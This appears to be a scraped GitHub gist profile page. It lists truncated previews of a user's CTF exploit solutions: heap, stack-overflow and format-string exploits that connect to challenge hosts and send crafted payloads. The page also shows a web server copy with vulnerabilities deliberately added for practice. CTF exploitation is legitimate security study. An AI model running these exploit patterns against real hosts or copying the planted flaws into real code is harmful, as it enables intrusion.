Skip to content

Instantly share code, notes, and snippets.

View err0rless's full-sized avatar
:shipit:

hibyegoodbye err0rless

:shipit:
  • Seoul, South Korea
  • 13:55 (UTC +09:00)
View GitHub Profile
@err0rless
err0rless / keybase.md
Created May 1, 2018 10:11
for keybase

Keybase proof

I hereby claim:

  • I am err0rless on github.
  • I am err0rless (https://keybase.io/err0rless) on keybase.
  • I have a public key ASCgWfK7wyYyKADMmaUsEGUj4Dz6TKBFfSbBcIcuUBCpYgo

To claim this, I am signing this object:

# BCTF 2016 pwnable bcloud
# HOUSE OF FORCE, Heap exploit task
from pwn import connst, dump
from struct import pack, unpack
s, t = connst("192.168.36.150", 9991)
print s.recv(1024)
s.send("A" * 63 + "Z")
@err0rless
err0rless / vod.py
Last active January 17, 2016 09:36
Holyshield 2016 exploit 300pts VOD prob exploit code
# Holyshield 2016 Exploitation 300 VOD solution
from pwn import connst, dump, shell
from struct import pack, unpack
s, t = connst("1.224.175.17", 9101)
print t.read_until("input number :")
s.send("1\n")
# Leak printf@libc address
# 32c3 CTF 2015 teufel @ 200pts
# the stack based overflow on the x86_64 system
from pwn import connst, shell
from struct import pack, unpack
s, t = connst("136.243.194.41", 666)
s.send(pack("Q", 0x09))
s.send("DDDDDDDDD")
from pwn import connst
from struct import pack
s, t = connst("136.243.194.62", 1024)
print t.read_until("name? ")
s.send(pack("Q", 0x00400d20) * 68 + pack("Q", 0x00600d20) * 15 + "\n")
print t.read_until("flag: ")
s.send("LIBC_FATAL_STDERR_=1\n")
# Seccon 2015 Quals - Exploit FSB:TreeWalker 200pts Solves:51
# github.com/SECCON/SECCON2015_online_CTF/tree/master/Exploit/200_FSB:%20TreeWalker
# FSB Leak task :)
from err0rless import connst
from struct import pack, unpack
s, t = connst("treewalker.pwn.seccon.jp", 20000)
def leak(addr):
p = "%p" * 20 # p = "%llx" * 30
<#
Created by err0rless 2015-11-15
Windows Server 2015 DNS Primary-zone auto set script
PS C:\Users\Administrator\Desktop> (Get-Host).version
Major Minor Build Revision
----- ----- ----- --------
3 0 -1 -1
Powershell version 3.0
from err0rless import connst, conns, dump
from struct import pack, unpack
import re, string, base64, time, socket, telnetlib
def send_request(password, ret_conn=0):
s = conns("192.168.95.152", 20004)
r = "GET / HTTP/1.0\r\n"
r += "Authorization: Basic "
r += base64.b64encode(password)
#include "../common/common.c"
// original code from micro_httpd_12dec2005.tar.gz -- acme.com. added vulnerabilities etc ;)
/* micro_httpd - really small HTTP server
**
** Copyright (c) 1999,2005 by Jef Poskanzer <jef@mail.acme.com>.
** All rights reserved.
**
** Redistribution and use in source and binary forms, with or without
from err0rless import connst
from struct import pack
import hmac, hashlib
s, t = connst("192.168.95.152", 20003)
# HMAC with hashlib.sha1
def HMAC(key, data):
h = hmac.new(key, data, hashlib.sha1)
h = h.hexdigest()